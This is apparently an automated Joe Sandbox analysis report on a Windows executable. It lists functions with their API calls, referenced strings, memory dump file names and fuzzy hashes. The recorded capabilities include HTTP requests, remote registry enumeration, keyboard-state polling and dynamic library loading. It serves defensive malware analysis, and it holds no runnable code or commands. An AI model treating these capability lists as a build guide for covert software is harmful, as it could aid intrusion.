Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00464A60
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00464A86
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00464AB6
InternetCloseHandle.WININET(00000000), ref: 00464AFD

Part of subcall function 004656A9: GetLastError.KERNEL32(?,?,00464A2B,00000000,00000000,00000001), ref: 004656BE

Strings

, xrefs: 00464AAF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 05983fa9deedcc93f5d9fd637876a3c6416bee256b8ba896f2c91aadaea2318b
Instruction ID: 2a94429cbc8b0829d2b7b6d62cc4299c6108b85d85a32c476b9750128d2df463
Opcode Fuzzy Hash: 05983fa9deedcc93f5d9fd637876a3c6416bee256b8ba896f2c91aadaea2318b
Instruction Fuzzy Hash: E021C2B5540208BFEF11DFA5DC85EBB76ECEB88B48F10402FF10596240EA689D05977A

Function 004138E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0048454E

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

_memset.LIBCMT ref: 00413965
_wcscpy.LIBCMT ref: 004139B5
Shell_NotifyIconW.SHELL32(00000001,?), ref: 004139C6

Strings

Line: , xrefs: 00484578

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 7fc44380feccde668e9ea3850c280be6c6cdd7622da0d9a1484c1f98df9608b6
Instruction ID: e3b4c6001375646a2e596e3dfb527939303d792070eaa876391da1c1f0c014fe
Opcode Fuzzy Hash: 7fc44380feccde668e9ea3850c280be6c6cdd7622da0d9a1484c1f98df9608b6
Instruction Fuzzy Hash: 0931A1B1519340ABD721EF60DC41BDF77E8AB58315F00452FF584821A1DB78AA88CB9A

Function 00478EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0042C657
Part of subcall function 0042C619: GetStockObject.GDI32(00000011), ref: 0042C66B
Part of subcall function 0042C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0042C675

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00478F69
LoadLibraryW.KERNEL32(?), ref: 00478F70
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00478F85
DestroyWindow.USER32(?), ref: 00478F8D

Strings

SysAnimate32, xrefs: 00478F44

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: eb2b16ec039b4a597912d2f4e9a727bdfec9613af6397bee4e913919bf81ee56
Instruction ID: bbe02b95c9bc03d0c59661d484dd5abe519ded7c55c327c62574411d0fc25925
Opcode Fuzzy Hash: eb2b16ec039b4a597912d2f4e9a727bdfec9613af6397bee4e913919bf81ee56
Instruction Fuzzy Hash: 2921CF71640205AFEF104F64DC48EFB37AAEB58328F10862EFA18D3290CB79DC519768

Function 00459E65 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00459E85
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00459EB6
GetStdHandle.KERNEL32(0000000C), ref: 00459EC8
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00459F02

Strings

nul, xrefs: 00459EFD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c16662d6191f9ebb43d19dd8adba7b531f38811baec09e9aa42d45a7fcdc630d
Instruction ID: 7b10a47c74f9d1173ebc0139abcead7f9ef3bc75a6170b80bba70fb0701c824a
Opcode Fuzzy Hash: c16662d6191f9ebb43d19dd8adba7b531f38811baec09e9aa42d45a7fcdc630d
Instruction Fuzzy Hash: F6219F70500305EBDB209F25DC06A9A7BB4AF95322F204A2EFCA5D72D1D7749C49CB58

Function 0045E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045E392
GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0045E3E6
__swprintf.LIBCMT ref: 0045E3FF
SetErrorMode.KERNEL32(00000000,00000001,00000000,004ADBF0), ref: 0045E43D

Strings

%lu, xrefs: 0045E3F9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: de677dbe7971270f3c2234247365bde9e314791aaf6e83db78314aa21cbe392b
Instruction ID: 734f41535c6becbfca90de6b45ff86bcd3bf813c622b0c14445dd797939bb818
Opcode Fuzzy Hash: de677dbe7971270f3c2234247365bde9e314791aaf6e83db78314aa21cbe392b
Instruction Fuzzy Hash: C6217F35A40108AFCB10EFA5CC85EEEB7B8EF99705F10406AF909D7292D635DE45CB64

Function 0044D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

Part of subcall function 0044D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0044D640
Part of subcall function 0044D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0044D653
Part of subcall function 0044D623: GetCurrentThreadId.KERNEL32 ref: 0044D65A
Part of subcall function 0044D623: AttachThreadInput.USER32(00000000), ref: 0044D661

GetFocus.USER32 ref: 0044D7FB

Part of subcall function 0044D66C: GetParent.USER32(?), ref: 0044D67A

GetClassNameW.USER32(?,?,00000100), ref: 0044D844
EnumChildWindows.USER32(?,0044D8BA), ref: 0044D86C
__swprintf.LIBCMT ref: 0044D886

Strings

%s%d, xrefs: 0044D880

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: f54968e54e7da24c8f395b3cba7e0626235be97db4e4ffdcdaadd4d6e0aad155
Instruction ID: 85ae171fde76cba0bd9a64b401f4829db83aa83bb8d2a68949573a3975ad5348
Opcode Fuzzy Hash: f54968e54e7da24c8f395b3cba7e0626235be97db4e4ffdcdaadd4d6e0aad155
Instruction Fuzzy Hash: 2B1106759002056BEF117F61CC85FEA3778AF54708F0040BFFE19AA186CBB899418B78

Function 00471836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004718E4
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00471917
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00471A3A
CloseHandle.KERNEL32(?), ref: 00471AB0

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: c6eb80a5f557ebfb876e266314057f8890e2fb33f68662bd33aceec7a2caacb6
Instruction ID: df25fd268a2a215cf15f1b8e3be7e016eb49b4239880d7bb7583c69aa4b296c8
Opcode Fuzzy Hash: c6eb80a5f557ebfb876e266314057f8890e2fb33f68662bd33aceec7a2caacb6
Instruction Fuzzy Hash: 07819770B40214ABDF10AF65C886B9D7BF5AF48724F04C05AF9096F392D7B8E9418B99

Function 0047DE72 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0047DFE5
SendMessageW.USER32(?,000000B0,?,?), ref: 0047E01D
IsDlgButtonChecked.USER32(?,00000001), ref: 0047E058
GetWindowLongW.USER32(?,000000EC), ref: 0047E079
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0047E091

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: a9123614b57be43799d2778c7d978afc9f68542964adb868877b9b6a3a5b3507
Instruction ID: 803316d3b03b15138b68fcb2468d20c76d437f7816969d7c633b751b9716b2f2
Opcode Fuzzy Hash: a9123614b57be43799d2778c7d978afc9f68542964adb868877b9b6a3a5b3507
Instruction Fuzzy Hash: 9D61BE35A14204AFDB25DF54C894FEA7BB6AF49310F04C4ABF94E973A1C739A940CB18

Function 00470579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004705DF
GetProcAddress.KERNEL32(00000000,?), ref: 0047066E
GetProcAddress.KERNEL32(00000000,00000000), ref: 0047068C
GetProcAddress.KERNEL32(00000000,?), ref: 004706D2
FreeLibrary.KERNEL32(00000000,00000004), ref: 004706EC

Part of subcall function 0042F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0045AEA5,?,?,00000000,00000008), ref: 0042F282
Part of subcall function 0042F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0045AEA5,?,?,00000000,00000008), ref: 0042F2A6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 3ffe05bc52fba1c4577ffecebb2df2a856603662a9f9b1af17ee4699c13f455f
Instruction ID: 906be2c9afb8143b42f27ccba376f61f8f671f3db3c17928a8af5b7571406677
Opcode Fuzzy Hash: 3ffe05bc52fba1c4577ffecebb2df2a856603662a9f9b1af17ee4699c13f455f
Instruction Fuzzy Hash: A6519E75A00205DFCB00EFA8C8919EEB7B5FF59314B04C06AE959AB351DB38ED45CB98

Function 00472D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

Part of subcall function 00473AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00472AA6,?,?), ref: 00473B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00472DE0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00472E1F
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00472E66
RegCloseKey.ADVAPI32(?,?), ref: 00472E92
RegCloseKey.ADVAPI32(00000000), ref: 00472E9F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: eae90f1b4187bebf5f8f2be5c77d0ccfd099c4714afa68388bfadb67811afd13
Instruction ID: e8ba25a5284bbb730a739f9488dae23436d553a38557d00cb2a610baee801dc9
Opcode Fuzzy Hash: eae90f1b4187bebf5f8f2be5c77d0ccfd099c4714afa68388bfadb67811afd13
Instruction Fuzzy Hash: 66518F71504204AFC714EF64C981EAFB7E8FF88318F00881EF59587291DB78E945CB56

Function 0047CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c454893084dcad4ebdbb744f437237e73d8bbf81efcf0b030e08a9477b82cb6f
Instruction ID: d924ec8ed94a6dad76d1c8e8b40399e53438fa397b6d8241a402609ec3470ef5
Opcode Fuzzy Hash: c454893084dcad4ebdbb744f437237e73d8bbf81efcf0b030e08a9477b82cb6f
Instruction Fuzzy Hash: C541D235D00104AFD721DF78DC89FEABBA5AB09320F15816BF81DA72E1C738AD41D698

Function 00461726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004617D4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004617FD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046183C

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00461861
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00461869

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 5cfcc8d91d4397ba7d550864286560e22081cc590a8f4215a1210d35f4db3a23
Instruction ID: 9ac0c198e873935fca568ab331bde7a2ec59c2a749bee8513a2fa88f050da8be
Opcode Fuzzy Hash: 5cfcc8d91d4397ba7d550864286560e22081cc590a8f4215a1210d35f4db3a23
Instruction Fuzzy Hash: 64412E35A00205DFCB11EF65C981EADBBF5FF48314B1480AAE80AAB361DB35ED41DB95

Function 0042B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0042B749
ScreenToClient.USER32(00000000,000000FF), ref: 0042B766
GetAsyncKeyState.USER32(00000001), ref: 0042B78B
GetAsyncKeyState.USER32(00000002), ref: 0042B799

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: acf2a287d754de4170a7c6e341ebe92528e760b4b62d301f11633ffcde86ab5c
Instruction ID: e51181ff0d60c74b037e6969449fd1fff1ec640e872a5f9c09d1c13b2b563dcb
Opcode Fuzzy Hash: acf2a287d754de4170a7c6e341ebe92528e760b4b62d301f11633ffcde86ab5c
Instruction Fuzzy Hash: 97416031A04119FFDF159F65C844AEEBB74FB85324F10422BF82992290C738AD50DB99

Function 0044C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0044C156
PostMessageW.USER32(?,00000201,00000001), ref: 0044C200
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0044C208
PostMessageW.USER32(?,00000202,00000000), ref: 0044C216
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0044C21E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: ede81817d88c11695058694a18d4f28ce3359f4d63016fbd525026f98a197759
Instruction ID: c786dd3ae5ae810e523066fe68b6cc0660058e7c6d8fcbf4d61b8985a6b7cfc2
Opcode Fuzzy Hash: ede81817d88c11695058694a18d4f28ce3359f4d63016fbd525026f98a197759
Instruction Fuzzy Hash: E931DF72901219EBEF04CFA8DD8DA9E3BB5EB44315F14422AF821AB2D1C7B49D04CF94

Function 0044E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0044E9CD
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044E9EA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0044EA22
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0044EA48
_wcsstr.LIBCMT ref: 0044EA52

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 2567bfc93764e833f1a141e2b7a2bd02ee35c62eaf9e0c0442ffd5be8e1cfc54
Instruction ID: 3cf9a1e65968263e567ac408ed36a1acf50cef3fa6847facd62c6197cf5b8069
Opcode Fuzzy Hash: 2567bfc93764e833f1a141e2b7a2bd02ee35c62eaf9e0c0442ffd5be8e1cfc54
